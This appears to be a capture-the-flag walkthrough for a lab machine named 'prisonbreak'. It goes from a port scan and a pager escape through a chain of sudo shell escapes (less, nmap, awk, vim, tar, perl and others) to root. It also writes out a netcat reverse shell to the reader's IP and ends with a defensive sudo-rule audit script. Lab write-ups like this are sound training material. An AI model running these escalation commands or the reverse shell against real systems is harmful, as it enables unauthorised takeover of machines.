# prisonbreak

There's also a video version, if you want to check it out: [prisonbreak](https://youtu.be/49v6HfC61W4?feature=shared)

**Port Scanning**

First we perform a port scan using Rustscan to identify open ports.

```
rustscan -a 10.0.200.47
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

Open 10.0.200.47:22
Open 10.0.200.47:1337
```

Once we know what ports are open, we use nmap to obtain the services and their versions running on these ports.

```
❯ nmap -p22,1337 -sCV -n -Pn -v 10.0.200.47 -oN scan
<SNIP>
Nmap scan report for 10.0.200.47
Host is up (0.15s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 39:d8:72:f0:6f:74:58:78:ea:2b:e4:06:b9:82:67:65 (RSA)
|   256 55:8b:25:46:3d:72:08:35:46:23:4f:4c:fa:70:ba:a7 (ECDSA)
|_  256 10:ce:b4:58:a2:c3:59:5b:0f:e7:91:e3:6a:04:fb:4e (ED25519)
1337/tcp open  waste?
| fingerprint-strings: 
|   GenericLines, NULL: 
|     [?1049h
|     [?1h
|     MORE(1) User Commands MORE(1)
<SNIP>
```

Options used (descriptions from the nmap help):

* `-p <ports>`: only scan the specified ports.
* `-sCV`: combines the options `-sC` and `-sV`.
* `-sC`: equivalent to `--script=default`.
* `-sV`: probe open ports to determine service/version info.
* `-n`: never do DNS resolution.
* `-Pn`: treat all hosts as online (skip host discovery).
* `-v`: increase verbosity level.
* `-oN <file>`: output scan in normal format.

Port 22 is running SSH, but Nmap cannot determine the service on port 1337, so we'll need to identify it manually.

**Gaining access**

Using Netcat to connect to port 1337, we receive the manual for the "more" command. We can escape from this environment by pressing `Esc` and then typing `:!bash`. After pressing Enter, we obtain a shell.

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FkY33jh61YsYv38KzMf95%2FPasted%20image%2020240806172217.png?alt=media&#x26;token=c4cf29e9-c155-4898-b286-5df8d9c03f9c" alt=""><figcaption></figcaption></figure>

**Upgrading shell**

To upgrade the shell, we execute the following command: `script /dev/null -qc bash`

Next, press `Ctrl+Z` and then run: `stty raw -echo; fg`

Finally, reset the terminal: `reset xterm`

With the shell back, execute: `export TERM=xterm`

And adjust the terminal size with: `stty rows 44 cols 172`

#### Horizontal privilege escalation

**cell2 user**

With the shell as the "cell1" user, execute: `sudo -l`

* `sudo -l, --list` list user's privileges.

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FN0dcUdTgjZE6OPpdRcLw%2FPasted%20image%2020240806172712.png?alt=media&#x26;token=82e8b033-c0bf-46d9-9525-1e5b97ff267d" alt=""><figcaption></figcaption></figure>

You see that we can execute `more` as the "cell2" user. Elevate privileges by running: `sudo -u cell2 more /etc/passwd` (or any other existing file). Press `Esc` followed by `:!bash`, just as before, to become the "cell2" user.

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FJF1T39dNuWCbVDo3btnr%2FPasted%20image%2020240806184636.png?alt=media&#x26;token=7a9030ca-4c1e-4e82-a92c-2aac78ddc4d7" alt=""><figcaption></figcaption></figure>

Having done this, we are the "cell2" user.

**cell3 user**

Run `sudo -l` again, and you'll see that you can execute `less` as the "cell3" user.

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FVYBzhfiVsldMRFZgLB0N%2FPasted%20image%2020240806193832.png?alt=media&#x26;token=07434e9a-48b9-4bcb-a944-91b753cc70e3" alt=""><figcaption></figcaption></figure>

Searching on Google, we found [this resource](https://gtfobins.github.io/gtfobins/less/#sudo) that explains how to escape from `less` using `sudo`. Run `sudo -u cell3 /usr/bin/less /etc/passwd`, then press `Esc` and type `:!bash` to switch to the "cell3" user.

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FEhFrCYnZfOq9O3zcXt4e%2FPasted%20image%2020240806192929.png?alt=media&#x26;token=be3dd300-bd51-4e65-84bd-d466351b1ecf" alt=""><figcaption></figcaption></figure>

**cell4 user**

As the "cell3" user, run `sudo -l`:

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FZl0gBhYjhkDtBkt9ozpt%2FPasted%20image%2020240806193716.png?alt=media&#x26;token=c4c4b007-45b5-4011-89ab-e7145b12b8a5" alt=""><figcaption></figcaption></figure>

Note that you can execute `nmap` as the "cell4" user. Searching for ways to escalate privileges with `nmap`, we found [this method on GTFObins](https://gtfobins.github.io/gtfobins/nmap/#sudo) to execute commands:

First, we have to be in a world-readable directory such as `/tmp`. There, execute the following commands:

`echo 'os.execute("/bin/bash")' > test`

`sudo -u cell4 /usr/bin/nmap --script test`

You now have access as "cell4".

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FSmZwWchfD1pLIGVqcC4f%2FPasted%20image%2020240807143038.png?alt=media&#x26;token=1d1c0702-dd8e-4b59-b15a-e9cab0460bb2" alt=""><figcaption></figcaption></figure>

**cell5 user**

As "cell4", run: `sudo -l`

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FFw1EJU8BvLu9j1kUvc3H%2FPasted%20image%2020240807143801.png?alt=media&#x26;token=7a8d2967-c2cc-48d5-8e72-8daef5dcfe6d" alt=""><figcaption></figcaption></figure>

To escalate to "cell5", we found [this GTFObins resource](https://gtfobins.github.io/gtfobins/awk/#sudo). Execute: `sudo -u cell5 /usr/bin/awk 'BEGIN {system("/bin/bash")}'`

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FTtvUKvEJfJpeZTpKuKrD%2FPasted%20image%2020240807144001.png?alt=media&#x26;token=486ae0eb-3519-4c65-960c-e4b75ab7854a" alt=""><figcaption></figcaption></figure>

We are now `cell5`.

**cell6 user**

For "cell6", execute `sudo -l`:

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FaWMHpxevqeYeYB6arOb6%2FPasted%20image%2020240807144118.png?alt=media&#x26;token=fd679fe3-d62d-422e-a594-6e5e93301988" alt=""><figcaption></figcaption></figure>

To gain access as "cell6", you can use the method outlined [here](https://gtfobins.github.io/gtfobins/find/#sudo): `sudo -u cell6 /usr/bin/find . -exec /bin/bash \; -quit`

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FB4ckwOsY2ujrIh75GWf9%2FPasted%20image%2020240807144312.png?alt=media&#x26;token=e4330cb4-5369-448d-83bd-1cdce1713c32" alt=""><figcaption></figcaption></figure>

After executing this command, we are `cell6`.

**cell7 user**

Run `sudo -l` as "cell6":

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FVtxmno6DnmIPGMblU9pm%2FPasted%20image%2020240807144352.png?alt=media&#x26;token=6c826174-470b-4a29-bb64-cfd42402cdb8" alt=""><figcaption></figcaption></figure>

This user can use sudo to execute vim as `cell7`. Use this method found on [GTFObins](https://gtfobins.github.io/gtfobins/vim/#sudo): `sudo -u cell7 /usr/bin/vim -c ':!/bin/bash'`

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FQ73zlJPOXQl8lhvW4Jtj%2FPasted%20image%2020240807144544.png?alt=media&#x26;token=a6a951c6-5ca5-4769-a65c-2e9351070883" alt=""><figcaption></figcaption></figure>

And you'll be `cell7`.

**cell8 user**

For "cell8", execute `sudo -l`:

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2Ffuk6PCQPL6i1ZtRLgPMg%2FPasted%20image%2020240807144658.png?alt=media&#x26;token=be49e101-132d-4036-82fd-746db43f857f" alt=""><figcaption></figcaption></figure>

So execute `sudo -u cell8 /usr/bin/links /etc/passwd`, then press `Esc` twice, hit Enter, and select the option to spawn an OS shell.

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FlcP0nQwYLM3fJJOtD9HB%2FPasted%20image%2020240807145621.png?alt=media&#x26;token=7b731361-5b32-4029-9af6-fd104ae6d1c1" alt=""><figcaption></figcaption></figure>

And you are now `cell8`. ![](https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FZf21W8okR2PXpA6hU7fm%2FPasted%20image%2020240807145758.png?alt=media\&token=028f2dbf-1032-447f-acc8-4ae73f0ba0fc)

**cell9 user**

As "cell8", execute `sudo -l`:

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FH0v65DZrP2YNrQZHxfq9%2FPasted%20image%2020240807145855.png?alt=media&#x26;token=29a86cc8-1c86-46bc-9547-de3cf81dba17" alt=""><figcaption></figcaption></figure>

This user can execute `/usr/bin/lynx` as "cell9". Following the steps from this [resource](https://0xffsec.com/handbook/shells/restricted-shells/#lynxlynx-doc), execute: `sudo -u cell9 /usr/bin/lynx /etc/passwd`, then enter the options with `o`.

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2Fs2DxiMtCLhaptVKWzmfL%2FPasted%20image%2020240807151139.png?alt=media&#x26;token=2b0556e7-46fb-47cd-95ff-969be7496d1d" alt=""><figcaption></figcaption></figure>

Change the `Editor` to `/usr/bin/vim`.

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FZl4I2oqAglaWGOYaP5KQ%2FPasted%20image%2020240807151701.png?alt=media&#x26;token=c1f18acf-550a-4666-94db-6ff187515f77" alt=""><figcaption></figcaption></figure>

Accept the changes.

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FwUgvU0MPuyhcPB1bo07B%2FPasted%20image%2020240807151728.png?alt=media&#x26;token=d3787930-df47-484c-a096-a70fc46ecc0f" alt=""><figcaption></figcaption></figure>

Finally, press `e` to enter the editor, and escape from Vim by pressing `Esc` followed by `:!bash`.

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FKdxmurHsz9BcnAdBSQL1%2FPasted%20image%2020240807151934.png?alt=media&#x26;token=215904ba-24cb-4eca-a870-3f2fefea9864" alt=""><figcaption></figcaption></figure>

**cell10 user**

Execute `sudo -l`:

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FqbXaOqSSf5xneblpzhNV%2FPasted%20image%2020240807152051.png?alt=media&#x26;token=b7845560-b3e8-4210-8da2-a5ca58c974c6" alt=""><figcaption></figcaption></figure>

`cell9` can execute `/usr/bin/zip` as `cell10`.

To escalate privileges, use this method found on [GTFObins](https://gtfobins.github.io/gtfobins/zip/#sudo): `sudo -u cell10 /usr/bin/zip /tmp/test /etc/hosts -T -TT 'bash #'`

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FXp0W4oXhxDzfCf4wfc29%2FPasted%20image%2020240807152239.png?alt=media&#x26;token=f60ce3e6-1869-43e4-9e58-2e44eeab2bff" alt=""><figcaption></figcaption></figure>

**cell11 user**

As "cell10", run: `sudo -l`

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FNZUHNavYdoW9FnNfUDDA%2FPasted%20image%2020240807152328.png?alt=media&#x26;token=0103455c-9fe4-43c7-8ea1-9f738f6f47a4" alt=""><figcaption></figcaption></figure>

`cell10` can execute `/bin/tar` as `cell11`. [GTFObins](https://gtfobins.github.io/gtfobins/tar/#sudo) documents this method to execute commands: `sudo -u cell11 /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash`

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FtjGNP5QpDfV5Za6LCBbQ%2FPasted%20image%2020240807152557.png?alt=media&#x26;token=ec6479ec-9982-4296-9e28-c991bca3316a" alt=""><figcaption></figcaption></figure>

**cell12 user**

Execute `sudo -l`:

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2Fwr374MzQLmRaYhwqx4Ug%2FPasted%20image%2020240807152639.png?alt=media&#x26;token=efebe87a-c2fa-4f14-a9f8-59eb8e154dd0" alt=""><figcaption></figcaption></figure>

`cell11` can execute `/usr/bin/mutt` as `cell12`, so execute: `sudo -u cell12 /usr/bin/mutt`. To escape, press `Esc` followed by `!`.

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2F8IOHEYjmYvUuVvdGUj5W%2FPasted%20image%2020240807152958.png?alt=media&#x26;token=4e4d7814-4b7e-451a-ba10-fa8373de9183" alt=""><figcaption></figcaption></figure>

Here, enter `bash` to get a shell, as explained in [this resource](https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/).

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2F8waDlnmQ717pHoeUoANG%2FPasted%20image%2020240807153043.png?alt=media&#x26;token=06aa75a9-2bba-481e-b913-b49250731474" alt=""><figcaption></figcaption></figure>

**cell13 user**

As "cell12", execute `sudo -l`:

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2Fh2ZVGHKlmUxMsKdgI0Aq%2FPasted%20image%2020240807153214.png?alt=media&#x26;token=e8e67437-0c61-4d7f-96c4-47d4577b5571" alt=""><figcaption></figcaption></figure>

To escalate to `cell13`, execute: `sudo -u cell13 /usr/bin/pinfo`. Press `!` to open a shell prompt within pinfo.

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2F7qwEnl0HQyJUh5JAla0D%2FPasted%20image%2020240807153320.png?alt=media&#x26;token=21c8b196-afba-431c-aa15-86330809aa5f" alt=""><figcaption></figcaption></figure>

Set up a listener on another tab: `nc -nlvp 443`. In the pinfo shell prompt, create a reverse shell: `nc -e /bin/bash <ip> 443`

Replace `<ip>` with your actual IP address. In your listener terminal, you should receive a connection.

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FBzdzLxC2yS97ihkzD9zS%2FPasted%20image%2020240807154019.png?alt=media&#x26;token=edd00f7f-d916-4fb6-8548-f327190d1fee" alt=""><figcaption></figcaption></figure>

Upgrade the shell: `script /dev/null -qc bash`, then press `Ctrl+Z` and immediately execute the command: `stty raw -echo; fg`

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2F2tzMASc0oxeezbhU73KS%2FPasted%20image%2020240807154110.png?alt=media&#x26;token=e25c2f77-f564-4a54-97dc-3132062d982b" alt=""><figcaption></figcaption></figure>

Finally, execute `reset xterm`

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FDTbc4fl2IPr476VcAwo1%2FPasted%20image%2020240807154220.png?alt=media&#x26;token=66af112d-de23-498a-8e76-ee7f9335edfb" alt=""><figcaption></figcaption></figure>

You are now `cell13`. ![](https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2F1PrsPUP913hq788Ov6zm%2FPasted%20image%2020240807154306.png?alt=media\&token=940f8032-18d1-4deb-88ea-f93a8ea5b0da)

**root user**

As cell13, execute `sudo -l`:

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2Fyodk0uypG2Msss7DaQ8R%2FPasted%20image%2020240807154351.png?alt=media&#x26;token=d2fcc3f2-cf2b-4ccd-a253-319751c80cb8" alt=""><figcaption></figcaption></figure>

`cell13` can execute `/usr/bin/perl` as root. This method on [GTFObins](https://gtfobins.github.io/gtfobins/perl/#sudo) shows us how to execute commands: `sudo /usr/bin/perl -e 'exec "/bin/bash";'`

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FEn1HNdzOXeCwx2Z9psXX%2FPasted%20image%2020240807154539.png?alt=media&#x26;token=a5eb6242-e2e7-4f0f-8dca-0403e2bb389f" alt=""><figcaption></figcaption></figure>

Congratulations! You now have root access.

The flags can be found in:

* /root
* /etc/shadow
* /proc/1/environ
* The home directory of every "cell" user.
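
Every hop above came from a sudo rule granting a binary that can start a shell, so the same chain can be found from the defender's side by reviewing `sudo -l` output. The following is an added example, not part of the original walkthrough: the `audit` function, the rule regex and the sample output are assumptions made for illustration, and the binary list covers only the programs used on this page.

```python
import re

# Binaries this walkthrough used to get a shell from a sudo rule,
# mapped to the feature that was abused at that step.
SHELL_CAPABLE = {
    "more": "pager shell escape", "less": "pager shell escape",
    "nmap": "--script loads arbitrary Lua", "awk": "system() in program text",
    "find": "-exec", "vim": ":! command", "links": "OS shell menu",
    "lynx": "user-chosen external editor", "zip": "-TT test command",
    "tar": "--checkpoint-action=exec", "mutt": "! shell escape",
    "pinfo": "! shell prompt", "perl": "exec in -e code",
}

# One rule line of `sudo -l` output: "(runas) TAG: TAG: cmd, cmd"
RULE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")

def audit(sudo_l_output):
    """Return (runas, path, reason, noexec) for each risky rule."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header, Defaults and blank lines
        runas = m.group(1).split(":")[0].strip()
        # NOEXEC asks sudo to stop the command from running further programs.
        noexec = "NOEXEC:" in m.group(2)
        # Simplification: assumes no escaped commas inside arguments.
        for cmd in m.group(3).split(","):
            words = cmd.split()
            if not words:
                continue
            path = words[0]
            name = path.rsplit("/", 1)[-1]
            if path == "ALL":
                findings.append((runas, path, "any command", noexec))
            elif name in SHELL_CAPABLE:
                findings.append((runas, path, SHELL_CAPABLE[name], noexec))
    return findings

# Constructed sample, not captured from the lab machine.
SAMPLE = """\
User cell3 may run the following commands on host:
    (cell4) NOPASSWD: /usr/bin/nmap
    (cell5) NOEXEC: /usr/bin/less /var/log/syslog, /usr/bin/id
    (root) NOPASSWD: /usr/bin/perl
"""

if __name__ == "__main__":
    for runas, path, reason, noexec in audit(SAMPLE):
        state = "NOEXEC set" if noexec else "no NOEXEC"
        print(f"{path} as {runas}: {reason} ({state})")
```

Rules flagged without `NOEXEC` are the ones to replace first, either with a narrower command or with a wrapper that does not expose the interactive feature.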
